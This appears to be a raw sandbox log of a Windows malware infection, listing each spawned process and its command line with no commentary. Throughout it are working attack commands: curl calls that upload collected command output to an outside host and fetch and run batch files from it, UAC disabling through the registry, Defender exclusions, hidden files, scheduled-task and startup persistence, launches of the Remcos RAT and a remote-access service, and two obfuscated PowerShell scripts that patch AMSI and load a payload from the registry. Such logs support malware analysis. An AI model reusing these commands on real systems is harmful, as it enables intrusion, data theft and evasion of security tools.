curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
C:\Windows\SysWOW64\cmd.exe
cmd /c type "C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F4F464741445553452F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe
"C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe"
C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe
"C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe"
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Microsoft\Windows\hyper-v.exe"
C:\Windows\SysWOW64\systeminfo.exe
systeminfo
C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe
"C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe"
C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe
"C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe"
C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe
"C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp9CA.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp9CA.tmp.bat
C:\Users\Admin\AppData\Local\Temp\a\RMX.exe
"C:\Users\Admin\AppData\Local\Temp\a\RMX.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Remcos\remcos.exe"
C:\ProgramData\Remcos\remcos.exe
C:\ProgramData\Remcos\remcos.exe
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe"
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\9HVSRQ90HDJM" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe
"C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe"
C:\Windows\System32\certutil.exe
"C:\Windows\System32\certutil.exe" -silent -importPFX -p "" -f "C:\Users\Admin\AppData\Local\Temp\tmp4E57.tmp"
C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe
"C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe"
C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe
"C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe"
C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe
"C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\8Q1DJEUA1N7Q" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe
"C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "MicrosoftEdgeUpdateTaskMachineCoreSC" /TR "C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del gU8ND0g.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe
"C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe"
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Users\Admin\AppData\Local\Temp\a\888.exe
"C:\Users\Admin\AppData\Local\Temp\a\888.exe"
C:\Users\Admin\AppData\Local\Temp\a\50to.exe
"C:\Users\Admin\AppData\Local\Temp\a\50to.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:UhSGjMbpBvuZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$thbOYdsVPKuerv,[Parameter(Position=1)][Type]$xiWsgPPiez)$OhahpFlFSVt=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Ref'+'l'+''+[Char](101)+'c'+'t'+''+'e'+''+[Char](100)+''+[Char](68)+'el'+[Char](101)+''+[Char](103)+''+'a'+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+''+'e'+''+[Char](109)+''+[Char](111)+'r'+'y'+'M'+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+'l'+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+'T'+''+[Char](121)+''+[Char](112)+''+'e'+'',''+[Char](67)+'l'+'a'+''+[Char](115)+'s'+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+'e'+'a'+'l'+''+[Char](101)+''+[Char](100)+','+[Char](65)+''+'n'+''+'s'+''+[Char](105)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+'s'+[Char](44)+'A'+[Char](117)+''+'t'+'o'+[Char](67)+''+[Char](108)+''+'a'+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$OhahpFlFSVt.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+'p'+''+[Char](101)+'cial'+[Char](78)+''+[Char](97)+'m'+[Char](101)+''+[Char](44)+'H'+'i'+'d'+'e'+'B'+[Char](121)+'Si'+[Char](103)+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$thbOYdsVPKuerv).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+'i'+'m'+[Char](101)+',M'+'a'+''+'n'+''+[Char](97)+''+[Char](103)+'e'+'d'+'');$OhahpFlFSVt.DefineMethod(''+[Char](73)+''+'n'+''+'v'+''+[Char](111)+''+[Char](107)+''+'e'+'','P'+[Char](117)+''+'b'+'l'+[Char](105)+''+[Char](99)+','+[Char](72)+''+'i'+'d'+[Char](101)+'B'+[Char](121)+''+[Char](83)+'ig'+[Char](44)+''+[Char](78)+''+'e'+''+[Char](119)+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+','+''+[Char](86)+''+'i'+''+'r'+''+[Char](116)+''+[Char](117)+'a'+'l'+'',$xiWsgPPiez,$thbOYdsVPKuerv).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+'e'+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $OhahpFlFSVt.CreateType();}$WOxBaLpxLBfLh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+'l'+[Char](108)+'')}).GetType('M'+[Char](105)+'cr'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t.'+[Char](87)+''+'i'+'n'+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+'s'+[Char](97)+''+[Char](102)+'e'+'N'+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+'h'+'o'+[Char](100)+'s');$BfAwityzpdOGbs=$WOxBaLpxLBfLh.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+'r'+''+'o'+''+[Char](99)+''+'A'+''+'d'+''+[Char](100)+'r'+'e'+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+'i'+[Char](99)+''+','+'St'+[Char](97)+''+'t'+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$iJaslFQbTeOIPZJXoVB=UhSGjMbpBvuZ @([String])([IntPtr]);$LaLvjwiczMungKIeROycyh=UhSGjMbpBvuZ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$vbLaEfmoXeu=$WOxBaLpxLBfLh.GetMethod(''+[Char](71)+'et'+'M'+''+'o'+''+[Char](100)+''+[Char](117)+'le'+[Char](72)+''+[Char](97)+'nd'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+[Char](114)+''+[Char](110)+'e'+'l'+''+'3'+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')));$mxMpRGzsSpPjGs=$BfAwityzpdOGbs.Invoke($Null,@([Object]$vbLaEfmoXeu,[Object](''+'L'+'oa'+'d'+''+[Char](76)+'i'+[Char](98)+''+'r'+'ar'+'y'+''+[Char](65)+'')));$NQviHZiIjlggXytqv=$BfAwityzpdOGbs.Invoke($Null,@([Object]$vbLaEfmoXeu,[Object](''+'V'+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+'ec'+[Char](116)+'')));$aQIeyXT=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mxMpRGzsSpPjGs,$iJaslFQbTeOIPZJXoVB).Invoke(''+[Char](97)+''+'m'+'s'+[Char](105)+''+'.'+''+[Char](100)+'l'+[Char](108)+'');$oHhmOIkUGmlMaKZmT=$BfAwityzpdOGbs.Invoke($Null,@([Object]$aQIeyXT,[Object](''+'A'+''+'m'+''+'s'+''+[Char](105)+'S'+[Char](99)+''+'a'+'n'+[Char](66)+'u'+[Char](102)+'fe'+[Char](114)+'')));$DBkMMYBztd=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NQviHZiIjlggXytqv,$LaLvjwiczMungKIeROycyh).Invoke($oHhmOIkUGmlMaKZmT,[uint32]8,4,[ref]$DBkMMYBztd);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$oHhmOIkUGmlMaKZmT,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NQviHZiIjlggXytqv,$LaLvjwiczMungKIeROycyh).Invoke($oHhmOIkUGmlMaKZmT,[uint32]8,0x20,[ref]$DBkMMYBztd);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+''+'T'+''+[Char](87)+'A'+[Char](82)+''+[Char](69)+'').GetValue(''+'r'+''+'u'+'ts'+[Char](115)+''+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{0f963603-14a6-41ac-a96e-49c513dde3d5}
C:\Windows\system32\lsass.exe
"C:\Windows\system32\lsass.exe"
C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im conhost.exe
C:\Users\Admin\AppData\Local\Temp\a\info.exe
"C:\Users\Admin\AppData\Local\Temp\a\info.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C reg delete "HKEY_USERS\.DEFAULT\SOFTWARE\TektonIT" /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_USERS\.DEFAULT\SOFTWARE\TektonIT" /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C regedit /s "%SystemDrive%\Windows\SysWOW64\ruts\11.reg
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\50.exe
"C:\Users\Admin\AppData\Local\Temp\a\50.exe"
C:\Windows\SysWOW64\regedit.exe
regedit /s "C:\Windows\SysWOW64\ruts\11.reg
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C schtasks /create /RU SYSTEM /TN "Microsoft\Windows\CertificateServicesClient\ruts" /TR "%SystemDrive%\Windows\SysWOW64\ruts\rutserv.exe" /sc onstart
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:XzSGgtVnuRCJ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ZwPKIPNdDGsxAn,[Parameter(Position=1)][Type]$MZmxauyXBC)$vFZYqoWQnHQ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+[Char](108)+'e'+[Char](99)+'tedD'+'e'+''+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+[Char](77)+'emo'+'r'+''+[Char](121)+'M'+[Char](111)+'d'+'u'+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+''+'s'+','+'P'+'u'+[Char](98)+''+[Char](108)+''+'i'+'c'+[Char](44)+'S'+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+'A'+[Char](110)+''+'s'+''+[Char](105)+'C'+[Char](108)+''+[Char](97)+'s'+'s'+''+[Char](44)+'Au'+[Char](116)+'o'+[Char](67)+'l'+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$vFZYqoWQnHQ.DefineConstructor('R'+'T'+''+'S'+'pe'+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+[Char](78)+''+[Char](97)+''+'m'+'e'+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+'g'+[Char](44)+''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$ZwPKIPNdDGsxAn).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+'t'+[Char](105)+'m'+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+'ag'+'e'+''+[Char](100)+'');$vFZYqoWQnHQ.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+'k'+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+'c'+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+'y'+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+'Ne'+'w'+'S'+[Char](108)+''+'o'+''+'t'+''+[Char](44)+'V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'',$MZmxauyXBC,$ZwPKIPNdDGsxAn).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+'e'+'d'+'');Write-Output $vFZYqoWQnHQ.CreateType();}$DSNlAcZSPOCre=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+'st'+[Char](101)+''+'m'+''+[Char](46)+'dl'+[Char](108)+'')}).GetType(''+[Char](77)+'i'+[Char](99)+''+[Char](114)+'o'+[Char](115)+''+'o'+'f'+'t'+'.'+[Char](87)+'i'+[Char](110)+''+[Char](51)+''+'2'+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+'e'+'N'+''+'a'+''+[Char](116)+'i'+[Char](118)+'eMe'+[Char](116)+''+[Char](104)+''+'o'+''+[Char](100)+'s');$aEqbJxljOyJREp=$DSNlAcZSPOCre.GetMethod(''+[Char](71)+''+[Char](101)+'t'+'P'+''+[Char](114)+'oc'+'A'+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+'t'+'ic'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$fJvLoFUZaqRWJGgZvUy=XzSGgtVnuRCJ @([String])([IntPtr]);$ennhYWXsQxztiRumUHacEL=XzSGgtVnuRCJ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$aYbogmOhwbP=$DSNlAcZSPOCre.GetMethod('G'+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+''+[Char](72)+'a'+'n'+''+'d'+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object]('k'+'e'+'r'+[Char](110)+'e'+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$dpsghQeCUIXNWc=$aEqbJxljOyJREp.Invoke($Null,@([Object]$aYbogmOhwbP,[Object]('L'+[Char](111)+''+[Char](97)+''+[Char](100)+'Libr'+'a'+''+'r'+'y'+[Char](65)+'')));$dGhnJNhXlujxlKtab=$aEqbJxljOyJREp.Invoke($Null,@([Object]$aYbogmOhwbP,[Object](''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$HEKbBJN=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dpsghQeCUIXNWc,$fJvLoFUZaqRWJGgZvUy).Invoke(''+[Char](97)+''+[Char](109)+'s'+[Char](105)+''+'.'+'d'+[Char](108)+''+[Char](108)+'');$DhDXmunwbzUgIUQQU=$aEqbJxljOyJREp.Invoke($Null,@([Object]$HEKbBJN,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+'S'+'c'+''+'a'+'nBu'+'f'+'f'+[Char](101)+'r')));$nBYmBOmmPJ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dGhnJNhXlujxlKtab,$ennhYWXsQxztiRumUHacEL).Invoke($DhDXmunwbzUgIUQQU,[uint32]8,4,[ref]$nBYmBOmmPJ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$DhDXmunwbzUgIUQQU,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dGhnJNhXlujxlKtab,$ennhYWXsQxztiRumUHacEL).Invoke($DhDXmunwbzUgIUQQU,[uint32]8,0x20,[ref]$nBYmBOmmPJ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+'T'+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue('r'+[Char](117)+''+[Char](116)+''+'s'+''+'s'+''+'t'+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /RU SYSTEM /TN "Microsoft\Windows\CertificateServicesClient\ruts" /TR "C:\Windows\SysWOW64\ruts\rutserv.exe" /sc onstart
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C schtasks /run /TN "Microsoft\Windows\CertificateServicesClient\ruts"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c delete.bat
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\SH.exe
"C:\Users\Admin\AppData\Local\Temp\a\SH.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe
"C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe"
C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe
"C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Users\Admin\AppData\Local\Temp\a\qwex.exe
"C:\Users\Admin\AppData\Local\Temp\a\qwex.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 408 -p 5772 -ip 5772
C:\Users\Admin\AppData\Local\Temp\a\XW.exe
"C:\Users\Admin\AppData\Local\Temp\a\XW.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5772 -s 1504
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /TN "Microsoft\Windows\CertificateServicesClient\ruts"
C:\Windows\SysWOW64\ruts\rutserv.exe
C:\Windows\SysWOW64\ruts\rutserv.exe
C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe
"C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\boleto.exe
"C:\Users\Admin\AppData\Local\Temp\a\boleto.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe
"C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe"
C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe
"C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe"
C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe
"C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe"
C:\Users\Admin\AppData\Local\Temp\a\kisteruop.exe
"C:\Users\Admin\AppData\Local\Temp\a\kisteruop.exe"
C:\Users\Admin\AppData\Local\Temp\a\vovdawdrg.exe
"C:\Users\Admin\AppData\Local\Temp\a\vovdawdrg.exe"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "xda" /tr "C:\Users\Admin\AppData\Roaming\System32\xda.dll"
C:\Users\Admin\AppData\Local\Temp\a\mfcthased.exe
"C:\Users\Admin\AppData\Local\Temp\a\mfcthased.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\kisloyat.exe
"C:\Users\Admin\AppData\Local\Temp\a\kisloyat.exe"
C:\Users\Admin\AppData\Local\Temp\a\daytjhasdawd.exe
"C:\Users\Admin\AppData\Local\Temp\a\daytjhasdawd.exe"
C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe
"C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe"
C:\Windows\system32\backgroundTaskHost.exe
